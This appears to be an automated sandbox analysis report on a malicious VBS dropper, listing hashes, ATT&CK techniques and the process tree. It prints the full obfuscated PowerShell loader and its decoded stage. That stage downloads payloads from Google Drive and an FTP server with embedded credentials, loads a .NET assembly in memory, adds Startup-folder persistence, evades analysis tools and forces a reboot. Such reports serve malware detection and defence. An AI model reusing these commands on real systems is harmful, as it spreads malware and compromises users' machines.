5eabf43f84b1893eb00a36c0c49eb140eb675553efa0811e6c60ade477ccf58a

Reason

Machine shutdown

General

Target

Sign021000110.vbs
Size

166KB
MD5

c9334c842ef061551279d98b8b48e1b2
SHA1

a794c208ab09fe3d9631c377a7411dda9fcdc46c
SHA256

505955df69d2bf11e756749c6ea8e8998a2fe26e1efa5542fbf6961233bdd317
SHA512

c4e41b8117eb461e122497198daa231e722ef76805fc82cb6274edabf3a8f3f9e0395bfc6a80a3fb0ac9c671dfb9e6324f6953090f90d4e9ff4f2116980dbeb3
SSDEEP

1536:5uAvuAvuAvuAvuAvuAvuAvuAvuAvuAKFZBfuAvuAvuAvuAvuAvuAvuAvuAvuAvuh:g555555555Y5555555555555555/

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://drive.google.com/uc?export=download&id=

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	2768	powershell.exe
7	2768	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
2768	powershell.exe
1064	powershell.exe
2804	powershell.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sign021000110.vbs	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sign021000110.vbs	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
4	drive.google.com
5	drive.google.com

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\wusa.lock	wusa.exe
File opened for modification	C:\Windows\Logs\DPX\setupact.log	wusa.exe
File opened for modification	C:\Windows\Logs\DPX\setuperr.log	wusa.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2804	powershell.exe
2768	powershell.exe
1940	powershell.exe
1064	powershell.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: SeDebugPrivilege	2804	powershell.exe
Token: SeDebugPrivilege	2768	powershell.exe
Token: SeDebugPrivilege	1940	powershell.exe
Token: SeDebugPrivilege	1064	powershell.exe
Token: SeShutdownPrivilege	1456	shutdown.exe
Token: SeRemoteShutdownPrivilege	1456	shutdown.exe

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 3044 wrote to memory of 2804	3044	WScript.exe	30
PID 3044 wrote to memory of 2804	3044	WScript.exe	30
PID 3044 wrote to memory of 2804	3044	WScript.exe	30
PID 2804 wrote to memory of 2768	2804	powershell.exe	32
PID 2804 wrote to memory of 2768	2804	powershell.exe	32
PID 2804 wrote to memory of 2768	2804	powershell.exe	32
PID 2768 wrote to memory of 1940	2768	powershell.exe	33
PID 2768 wrote to memory of 1940	2768	powershell.exe	33
PID 2768 wrote to memory of 1940	2768	powershell.exe	33
PID 1940 wrote to memory of 2592	1940	powershell.exe	34
PID 1940 wrote to memory of 2592	1940	powershell.exe	34
PID 1940 wrote to memory of 2592	1940	powershell.exe	34
PID 2768 wrote to memory of 1064	2768	powershell.exe	35
PID 2768 wrote to memory of 1064	2768	powershell.exe	35
PID 2768 wrote to memory of 1064	2768	powershell.exe	35
PID 2768 wrote to memory of 1456	2768	powershell.exe	37
PID 2768 wrote to memory of 1456	2768	powershell.exe	37
PID 2768 wrote to memory of 1456	2768	powershell.exe	37

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Sign021000110.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:3044
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $cjckj = 'Ow' + [char]66 + '9ADsAKQAgACkAIAAnAG0Acw' + [char]66 + '' + [char]66 + 'AGcAZQ' + [char]66 + 'SAEQARAAgAEQAJwAgACwAIA' + [char]66 + 'NAG8Adw' + [char]66 + 'OAHMAJAAgACwAIAAnAGgAdA' + [char]66 + '0AHAAcwA6AC8ALw' + [char]66 + 'jAG8Abg' + [char]66 + 'pAG0AYQ' + [char]66 + 'nAGUAbg' + [char]66 + 'jAGEAbg' + [char]66 + 'jAHUAbgAuAGMAbw' + [char]66 + 'tAC8AYgAuAHQAeA' + [char]66 + '0ACcAIAAoACAAXQ' + [char]66 + 'dAFsAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAG8AWwAgACwAIA' + [char]66 + 'sAGwAdQ' + [char]66 + 'uACQAIAAoAGUAaw' + [char]66 + 'vAHYAbg' + [char]66 + 'JAC4AKQAgAG0ARw' + [char]66 + 'xAGkAbgAkACAAKA' + [char]66 + 'kAG8AaA' + [char]66 + '0AGUATQ' + [char]66 + '0AGUARwAuACkAIA' + [char]66 + 'FAGYAWA' + [char]66 + 'zAGcAJAAgACsAIA' + [char]66 + 'HAGkAVA' + [char]66 + '6AEoAJAAgACgAZQ' + [char]66 + 'wAHkAVA' + [char]66 + '0AGUARwAuACkAIA' + [char]66 + '6AGQAZg' + [char]66 + '5AEYAJAAgACgAZA' + [char]66 + 'hAG8ATAAuAG4AaQ' + [char]66 + 'hAG0Abw' + [char]66 + 'EAHQAbg' + [char]66 + 'lAHIAcg' + [char]66 + '1AEMAOgA6AF0Abg' + [char]66 + 'pAGEAbQ' + [char]66 + 'vAEQAcA' + [char]66 + 'wAEEALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bADsAJw' + [char]66 + 'JAFYARg' + [char]66 + 'yAHAAJwAgAD0AIA' + [char]66 + 'tAEcAcQ' + [char]66 + 'pAG4AJAA7ACcAMQ' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMAJwAgAD0AIA' + [char]66 + 'FAGYAWA' + [char]66 + 'zAGcAJAA7ACcALgAzAHkAcg' + [char]66 + 'hAHIAYg' + [char]66 + 'pAEwAcw' + [char]66 + 'zAGEAbA' + [char]66 + 'DACcAIAA9ACAARw' + [char]66 + 'pAFQAeg' + [char]66 + 'KACQAOwAnACUASQ' + [char]66 + 'oAHEAUg' + [char]66 + 'YACUAJwAgAD0AIA' + [char]66 + 'NAG8Adw' + [char]66 + 'OAHMAJAA7ACkAIAApACcAQQAnACwAJwCTIToAkyEnACgAZQ' + [char]66 + 'jAGEAbA' + [char]66 + 'wAGUAcgAuAG4AeQ' + [char]66 + 'yAGwAeQAkACAAKA' + [char]66 + 'nAG4AaQ' + [char]66 + 'yAHQAUwA0ADYAZQ' + [char]66 + 'zAGEAQg' + [char]66 + 'tAG8Acg' + [char]66 + 'GADoAOg' + [char]66 + 'dAHQAcg' + [char]66 + 'lAHYAbg' + [char]66 + 'vAEMALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAcw' + [char]66 + 'bACAAPQAgAHoAZA' + [char]66 + 'mAHkARgAkACAAXQ' + [char]66 + 'dAFsAZQ' + [char]66 + '0AHkAQg' + [char]66 + 'bADsAIAApADgARg' + [char]66 + 'UAFUAIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALQAgAFEARw' + [char]66 + 'wAGUASQAkACAAaA' + [char]66 + '0AGEAUAAtACAAdA' + [char]66 + 'uAGUAdA' + [char]66 + 'uAG8AQwAtAHQAZQ' + [char]66 + 'HACgAIAA9ACAAbg' + [char]66 + '5AHIAbA' + [char]66 + '5ACQAOwAgACAAfQAgAGcAbg' + [char]66 + 'pAHMAcg' + [char]66 + 'hAFAAYw' + [char]66 + 'pAHMAYQ' + [char]66 + 'CAGUAcw' + [char]66 + 'VAC0AIA' + [char]66 + 'RAEcAcA' + [char]66 + 'lAEkAJAAgAGUAbA' + [char]66 + 'pAEYAdA' + [char]66 + '1AE8ALQAgAHgAag' + [char]66 + 'rAHgAZwAkACAASQ' + [char]66 + 'SAFUALQAgAHQAcw' + [char]66 + 'lAHUAcQ' + [char]66 + 'lAFIAYg' + [char]66 + 'lAFcALQ' + [char]66 + 'lAGsAbw' + [char]66 + '2AG4ASQA7ACAAKQAgAFEARw' + [char]66 + 'wAGUASQAkACAAaA' + [char]66 + '0AGEAUAAtACAAdA' + [char]66 + 'uAGUAdA' + [char]66 + 'uAG8AQwAtAHQAZQ' + [char]66 + 'HACAAKAAgAD0AIA' + [char]66 + '4AGoAaw' + [char]66 + '4AGcAJAA7ACAAKQAnAHQAeA' + [char]66 + '0AC4AMQAwAGwAbA' + [char]66 + 'kACcAIAArACAAKQAoAGgAdA' + [char]66 + 'hAFAAcA' + [char]66 + 'tAGUAVA' + [char]66 + '0AGUARwA6ADoAXQ' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAC4ATw' + [char]66 + 'JAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAoACAAPQAgAFEARw' + [char]66 + 'wAGUASQAkAHsAIA' + [char]66 + 'kAG4AYQ' + [char]66 + 'tAG0Abw' + [char]66 + 'jAC0AIA' + [char]66 + 'lAHgAZQAuAGwAbA' + [char]66 + 'lAGgAcw' + [char]66 + 'yAGUAdw' + [char]66 + 'vAHAAOwAgADEALgAwAC4AMAAuADcAMgAxACAAZw' + [char]66 + 'uAGkAcAA7ACAAYwAvACAAZQ' + [char]66 + '4AGUALg' + [char]66 + 'kAG0AYwA7AGwAYQ' + [char]66 + 'pAHQAbg' + [char]66 + 'lAGQAZQ' + [char]66 + 'yAGMAJAAgAGwAYQ' + [char]66 + 'pAHQAbg' + [char]66 + 'lAGQAZQ' + [char]66 + 'yAEMALQAgAGcAbg' + [char]66 + 'pAHMAcg' + [char]66 + 'hAFAAYw' + [char]66 + 'pAHMAYQ' + [char]66 + 'CAGUAcw' + [char]66 + 'VAC0AIA' + [char]66 + 'RAEcAcA' + [char]66 + 'lAEkAJAAgAGUAbA' + [char]66 + 'pAEYAdA' + [char]66 + '1AE8ALQAgAHcAeg' + [char]66 + 'kAGoAeQAkACAASQ' + [char]66 + 'SAFUALQAgAHQAcw' + [char]66 + 'lAHUAcQ' + [char]66 + 'lAFIAYg' + [char]66 + 'lAFcALQ' + [char]66 + 'lAGsAbw' + [char]66 + '2AG4ASQA7ACkAKQApACkAKQAgADYANQAgACwANQA1ACAALAAzADUAIAAsADkANAAgACwANAA2ACAALAA0ADYAIAAsADkANgAgACwAMAAxADEAIAAsADYANwAgACwAOAA2ACAALAA3ADcAIAAsADAAMAAxACAALAA5ADYAIAAsADAAMQAxACAALAAyADAAMQAgACwAOQAwADEAKA' + [char]66 + 'dAF0AWw' + [char]66 + 'yAGEAaA' + [char]66 + 'jAFsAIA' + [char]66 + 'uAGkAbw' + [char]66 + 'qAC0AKAAgAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TAC0AIA' + [char]66 + 'lAGMAcg' + [char]66 + 'vAEYALQAgAHQAeA' + [char]66 + 'lAFQAbg' + [char]66 + 'pAGEAbA' + [char]66 + 'QAHMAQQAtACAAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMAZQ' + [char]66 + 'yAHUAYw' + [char]66 + 'lAFMALQ' + [char]66 + 'vAFQAdA' + [char]66 + 'yAGUAdg' + [char]66 + 'uAG8AQwAoACAALAApACkAOQA0ACwANgAxADEALAA3ADkALAA0ADEAMQAsADgAOQAsADgAMQAxACwANwAwADEALAA5ADkALAA1ADEAMQAsADEAMAAxACwAMAAwADEAKA' + [char]66 + 'dAF0AWw' + [char]66 + 'yAGEAaA' + [char]66 + 'jAFsAIA' + [char]66 + 'uAGkAbw' + [char]66 + 'qAC0AKAAoAGwAYQ' + [char]66 + 'pAHQAbg' + [char]66 + 'lAGQAZQ' + [char]66 + 'yAEMAUw' + [char]66 + 'QACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAE8ALQ' + [char]66 + '3AGUATgAoACAAPQAgAGwAYQ' + [char]66 + 'pAHQAbg' + [char]66 + 'lAGQAZQ' + [char]66 + 'yAGMAJAA7ACkAJw' + [char]66 + '0AHgAdAAuADEAMA' + [char]66 + 'sAGwAZAAnACAAKwAgACkAKA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAHAAbQ' + [char]66 + 'lAFQAdA' + [char]66 + 'lAEcAOgA6AF0AaA' + [char]66 + '0AGEAUAAuAE8ASQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAAoACAAPQAgAFEARw' + [char]66 + 'wAGUASQAkADsAKQAgACcAdA' + [char]66 + '4AHQALgAxADAATA' + [char]66 + 'MAEQALwAxADAALwAnACAAKwAgACcAcg' + [char]66 + 'lAHQAcA' + [char]66 + '5AHIAYw' + [char]66 + 'wAFUALw' + [char]66 + 'yAGIALg' + [char]66 + 'tAG8AYwAuAHQAYQ' + [char]66 + 'yAGIAdg' + [char]66 + 'rAGMAcw' + [char]66 + 'lAGQALg' + [char]66 + 'wAHQAZg' + [char]66 + 'AADEAdA' + [char]66 + 'hAHIAYg' + [char]66 + '2AGsAYw' + [char]66 + 'zAGUAZAAvAC8AOg' + [char]66 + 'wAHQAZgAnACgAIAA9ACAAdw' + [char]66 + '6AGQAag' + [char]66 + '5ACQAOw' + [char]66 + '9ACAACgANADsAdA' + [char]66 + 'pAHgAZQAgACAAIAAgACAAIAAKAA0AOwAgAGUAYw' + [char]66 + 'yAG8AZgAtACAAcg' + [char]66 + 'lAHQAdQ' + [char]66 + 'wAG0Abw' + [char]66 + 'DAC0AdA' + [char]66 + 'yAGEAdA' + [char]66 + 'zAGUAUgAKAA0AIA' + [char]66 + '7AGUAcw' + [char]66 + 'sAGUACgANAAoADQ' + [char]66 + '9AAoADQAgACAAIAAgACAAIAAgAAoADQAgAHsAKQ' + [char]66 + 'sAGwAdQ' + [char]66 + 'OACQAIA' + [char]66 + 'xAGUALQAgACkAZQ' + [char]66 + '1AG4AaQ' + [char]66 + '0AG4Abw' + [char]66 + 'DAHkAbA' + [char]66 + '0AG4AZQ' + [char]66 + 'sAGkAUwAgAGEAZQAtACAAJw' + [char]66 + 'lAHoAeQ' + [char]66 + 'sAGEAbg' + [char]66 + 'hACcALAAnAFMATg' + [char]66 + 'EAGUAdA' + [char]66 + 'hAHAAYQAnACwAJw' + [char]66 + 'rAHIAYQ' + [char]66 + 'oAHMAZQ' + [char]66 + 'yAGkAVwAnACAAcw' + [char]66 + 'zAGUAYw' + [char]66 + 'vAHIAcAAtAHQAZQ' + [char]66 + 'nACgAKA' + [char]66 + 'mAGkAOwAgADIAMQ' + [char]66 + 'zAGwAVAA6ADoAXQ' + [char]66 + 'lAHAAeQ' + [char]66 + 'UAGwAbw' + [char]66 + 'jAG8AdA' + [char]66 + 'vAHIAUA' + [char]66 + '5AHQAaQ' + [char]66 + 'yAHUAYw' + [char]66 + 'lAFMALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAA9ACAAbA' + [char]66 + 'vAGMAbw' + [char]66 + '0AG8Acg' + [char]66 + 'QAHkAdA' + [char]66 + 'pAHIAdQ' + [char]66 + 'jAGUAUwA6ADoAXQ' + [char]66 + 'yAGUAZw' + [char]66 + 'hAG4AYQ' + [char]66 + 'NAHQAbg' + [char]66 + 'pAG8AUA' + [char]66 + 'lAGMAaQ' + [char]66 + '2AHIAZQ' + [char]66 + 'TAC4AdA' + [char]66 + 'lAE4ALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bADsAIA' + [char]66 + '9AGUAdQ' + [char]66 + 'yAHQAJA' + [char]66 + '7ACAAPQAgAGsAYw' + [char]66 + 'hAGIAbA' + [char]66 + 'sAGEAQw' + [char]66 + 'uAG8AaQ' + [char]66 + '0AGEAZA' + [char]66 + 'pAGwAYQ' + [char]66 + 'WAGUAdA' + [char]66 + 'hAGMAaQ' + [char]66 + 'mAGkAdA' + [char]66 + 'yAGUAQw' + [char]66 + 'yAGUAdg' + [char]66 + 'yAGUAUwA6ADoAXQ' + [char]66 + 'yAGUAZw' + [char]66 + 'hAG4AYQ' + [char]66 + 'NAHQAbg' + [char]66 + 'pAG8AUA' + [char]66 + 'lAGMAaQ' + [char]66 + '2AHIAZQ' + [char]66 + 'TAC4AdA' + [char]66 + 'lAE4ALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bAHsAIA' + [char]66 + 'lAHMAbA' + [char]66 + 'lAH0AIA' + [char]66 + 'mAC8AIAAwACAAdAAvACAAcgAvACAAZQ' + [char]66 + '4AGUALg' + [char]66 + 'uAHcAbw' + [char]66 + 'kAHQAdQ' + [char]66 + 'oAHMAIAA7ACcAMAA4ADEAIA' + [char]66 + 'wAGUAZQ' + [char]66 + 'sAHMAJwAgAGQAbg' + [char]66 + 'hAG0AbQ' + [char]66 + 'vAGMALQAgAGUAeA' + [char]66 + 'lAC4AbA' + [char]66 + 'sAGUAaA' + [char]66 + 'zAHIAZQ' + [char]66 + '3AG8AcAA7ACAAZQ' + [char]66 + 'jAHIAbw' + [char]66 + 'mAC0AIAApACAAJw' + [char]66 + 'wAHUAdA' + [char]66 + 'yAGEAdA' + [char]66 + 'TAFwAcw' + [char]66 + 'tAGEAcg' + [char]66 + 'nAG8Acg' + [char]66 + 'QAFwAdQ' + [char]66 + 'uAGUATQAgAHQAcg' + [char]66 + 'hAHQAUw' + [char]66 + 'cAHMAdw' + [char]66 + 'vAGQAbg' + [char]66 + 'pAFcAXA' + [char]66 + '0AGYAbw' + [char]66 + 'zAG8Acg' + [char]66 + 'jAGkATQ' + [char]66 + 'cAGcAbg' + [char]66 + 'pAG0AYQ' + [char]66 + 'vAFIAXA' + [char]66 + 'hAHQAYQ' + [char]66 + 'EAHAAcA' + [char]66 + '' + [char]66 + 'AFwAJwAgACsAIA' + [char]66 + 'sAGcAeQ' + [char]66 + 'uAEoAJAAgACgAIA' + [char]66 + 'uAG8AaQ' + [char]66 + '0AGEAbg' + [char]66 + 'pAHQAcw' + [char]66 + 'lAEQALQAgACcAJQ' + [char]66 + 'JAGgAcQ' + [char]66 + 'SAFgAJQAnACAAbQ' + [char]66 + 'lAHQASQAtAHkAcA' + [char]66 + 'vAEMAIAA7ACAAdA' + [char]66 + 'yAGEAdA' + [char]66 + 'zAGUAcg' + [char]66 + 'vAG4ALwAgAHQAZQ' + [char]66 + 'pAHUAcQAvACAAQg' + [char]66 + 'sAHAAaw' + [char]66 + '0ACAAZQ' + [char]66 + '4AGUALg' + [char]66 + 'hAHMAdQ' + [char]66 + '3ACAAZQ' + [char]66 + '4AGUALg' + [char]66 + 'sAGwAZQ' + [char]66 + 'oAHMAcg' + [char]66 + 'lAHcAbw' + [char]66 + 'wACAAOwApACcAdQ' + [char]66 + 'zAG0ALg' + [char]66 + 'uAGkAdw' + [char]66 + 'wAFUAXAAnACAAKwAgAGoATQ' + [char]66 + 'PAHoASAAkACgAIAA9ACAAQg' + [char]66 + 'sAHAAaw' + [char]66 + '0ADsAKQAgAGUAbQ' + [char]66 + 'hAE4Acg' + [char]66 + 'lAHMAVQA6ADoAXQ' + [char]66 + '0AG4AZQ' + [char]66 + 'tAG4Abw' + [char]66 + 'yAGkAdg' + [char]66 + 'uAEUAWwAgACsAIAAnAFwAcw' + [char]66 + 'yAGUAcw' + [char]66 + 'VAFwAOg' + [char]66 + 'DACcAKAAgAD0AIA' + [char]66 + 'sAGcAeQ' + [char]66 + 'uAEoAJAA7ACkAIAApACcAdQ' + [char]66 + 'zAG0ALg' + [char]66 + 'uAGkAdw' + [char]66 + 'wAFUAXAAnACAAKwAgAGoATQ' + [char]66 + 'PAHoASAAkACgAIAAsAGwAZg' + [char]66 + 'zAGMAegAkACgAZQ' + [char]66 + 'sAGkARg' + [char]66 + 'kAGEAbw' + [char]66 + 'sAG4Adw' + [char]66 + 'vAEQALg' + [char]66 + '2AHcAdg' + [char]66 + '6AGcAJAA7ADgARg' + [char]66 + 'UAFUAOgA6AF0AZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC4AdA' + [char]66 + '4AGUAVAAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAA9ACAAZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC4Adg' + [char]66 + '3AHYAeg' + [char]66 + 'nACQAOwApAHQAbg' + [char]66 + 'lAGkAbA' + [char]66 + 'DAGIAZQ' + [char]66 + 'XAC4AdA' + [char]66 + 'lAE4AIA' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIATwAtAHcAZQ' + [char]66 + 'OACgAIAA9ACAAdg' + [char]66 + '3AHYAeg' + [char]66 + 'nACQAOw' + [char]66 + '9ADsAIAApACcAdA' + [char]66 + 'PAEwAYw' + [char]66 + 'fAEsAYQAzAFoAZg' + [char]66 + 'vAFgAMg' + [char]66 + 'KAEoAcg' + [char]66 + 'WAGgAbQ' + [char]66 + 'WADkAYw' + [char]66 + 'tADkAWA' + [char]66 + 'zAHUAWA' + [char]66 + 'tAGoAMQ' + [char]66 + 'nADEAJwAgACsAIA' + [char]66 + 'sAGYAcw' + [char]66 + 'jAHoAJAAoACAAPQAgAGwAZg' + [char]66 + 'zAGMAegAkAHsAIA' + [char]66 + 'lAHMAbA' + [char]66 + 'lAH0AOwAgACkAJwAyADQAdQ' + [char]66 + 'YAEoAVA' + [char]66 + 'xAGEAbQ' + [char]66 + 'nAHkATQ' + [char]66 + '0AEYAeg' + [char]66 + 'hAGsAUA' + [char]66 + 'SADEAcQ' + [char]66 + 'fAEkAdg' + [char]66 + 'HAGkAWA' + [char]66 + 'OAGQAcQ' + [char]66 + 'hAE4AMQAnACAAKwAgAGwAZg' + [char]66 + 'zAGMAegAkACgAIAA9ACAAbA' + [char]66 + 'mAHMAYw' + [char]66 + '6ACQAewAgACkAIA' + [char]66 + 'FAEEAaw' + [char]66 + 'sAGsAJAAgACgAIA' + [char]66 + 'mAGkAOwAgACkAJwA0ADYAJwAoAHMAbg' + [char]66 + 'pAGEAdA' + [char]66 + 'uAG8AQwAuAEUAUg' + [char]66 + 'VAFQAQw' + [char]66 + 'FAFQASQ' + [char]66 + 'IAEMAUg' + [char]66 + '' + [char]66 + 'AF8AUg' + [char]66 + 'PAFMAUw' + [char]66 + 'FAEMATw' + [char]66 + 'SAFAAOg' + [char]66 + '2AG4AZQAkACAAPQAgAEUAQQ' + [char]66 + 'rAGwAawAkADsAJwA9AGQAaQAmAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8AZAA9AHQAcg' + [char]66 + 'vAHAAeA' + [char]66 + 'lAD8AYw' + [char]66 + '1AC8AbQ' + [char]66 + 'vAGMALg' + [char]66 + 'lAGwAZw' + [char]66 + 'vAG8AZwAuAGUAdg' + [char]66 + 'pAHIAZAAvAC8AOg' + [char]66 + 'zAHAAdA' + [char]66 + '0AGgAJwAgAD0AIA' + [char]66 + 'sAGYAcw' + [char]66 + 'jAHoAJAA7ACkAIAAnAHUAcw' + [char]66 + 'tAC4Abg' + [char]66 + 'pAHcAcA' + [char]66 + 'VAFwAJwAgACsAIA' + [char]66 + 'qAE0ATw' + [char]66 + '6AEgAJAAgACgAIA' + [char]66 + 'sAGUAZAA7ACkAKA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAHAAbQ' + [char]66 + 'lAFQAdA' + [char]66 + 'lAEcAOgA6AF0AaA' + [char]66 + '0AGEAUAAuAE8ASQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAA9ACAAag' + [char]66 + 'NAE8Aeg' + [char]66 + 'IACQAewAgACkAIA' + [char]66 + 'oAGkAVA' + [char]66 + '' + [char]66 + 'AEsAJAAgACgAIA' + [char]66 + 'mAGkAOwAgACkAMgAoAHMAbA' + [char]66 + 'hAHUAcQ' + [char]66 + 'FAC4Acg' + [char]66 + 'vAGoAYQ' + [char]66 + 'NAC4Abg' + [char]66 + 'vAGkAcw' + [char]66 + 'yAGUAVgAuAHQAcw' + [char]66 + 'vAGgAJAAgAD0AIA' + [char]66 + 'oAGkAVA' + [char]66 + '' + [char]66 + 'AEsAJAAgADsA';$cjckj = $cjckj.replace('уЦϚ' , 'B') ;;$npmll = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $cjckj ) ); $npmll = $npmll[-1..-$npmll.Length] -join '';$npmll = $npmll.replace('%XRqhI%','C:\Users\Admin\AppData\Local\Temp\Sign021000110.vbs');powershell $npmll
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2804
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $KATih = $host.Version.Major.Equals(2) ;if ( $KATih ) {$HzOMj = [System.IO.Path]::GetTempPath();del ( $HzOMj + '\Upwin.msu' );$zcsfl = 'https://drive.google.com/uc?export=download&id=';$klkAE = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $klkAE ) {$zcsfl = ($zcsfl + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$zcsfl = ($zcsfl + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$gzvwv = (New-Object Net.WebClient);$gzvwv.Encoding = [System.Text.Encoding]::UTF8;$gzvwv.DownloadFile($zcsfl, ($HzOMj + '\Upwin.msu') );$Jnygl = ('C:\Users\' + [Environment]::UserName );tkplB = ($HzOMj + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\Sign021000110.vbs' -Destination ( $Jnygl + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit; };$yjdzw = ('ftp://[email protected]/Upcrypter' + '/01/DLL01.txt' );$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$credential = (New-Object PSCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)), (ConvertTo-SecureString -AsPlainText -Force -String (-join [char[]](109, 102, 110, 69, 100, 77, 68, 76, 110, 69, 64, 64, 49, 53, 55, 56 )))));Invoke-WebRequest -URI $yjdzw -OutFile $IepGQ -UseBasicParsing -Credential $credential;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$IepGQ = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$gxkjx = ( Get-Content -Path $IepGQ ) ;Invoke-WebRequest -URI $gxkjx -OutFile $IepGQ -UseBasicParsing } ;$ylryn = (Get-Content -Path $IepGQ -Encoding UTF8) ;[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ylryn.replace('↓:↓','A') );$sNwoM = 'C:\Users\Admin\AppData\Local\Temp\Sign021000110.vbs';$JzTiG = 'ClassLibrary3.';$gsXfE = 'Class1';$niqGm = 'prFVI';[System.AppDomain]::CurrentDomain.Load( $Fyfdz ).GetType( $JzTiG + $gsXfE ).GetMethod( $niqGm ).Invoke( $null , [object[]] ( 'txt.b/moc.nucnacnegaminoc//:sptth' , $sNwoM , 'D DDRegAsm' ) );};"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Drops startup file
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2768
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" wusa.exe tkplB /quiet /norestart
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1940
    - - C:\Windows\system32\wusa.exe
        
        "C:\Windows\system32\wusa.exe" tkplB /quiet /norestart
        5⤵
        Drops file in Windows directory
        
        PID:2592
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "sleep 180"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1064
  - - C:\Windows\system32\shutdown.exe
      "C:\Windows\system32\shutdown.exe" /r /t 0 /f
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1456

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0
1⤵
PID:2348

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x1
1⤵
PID:2304

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
65edd93f2af85b3cf56b954afdeea27e

SHA1
d294ade10eb2f4d6e6985471344f8e0cceeb2ff5

SHA256
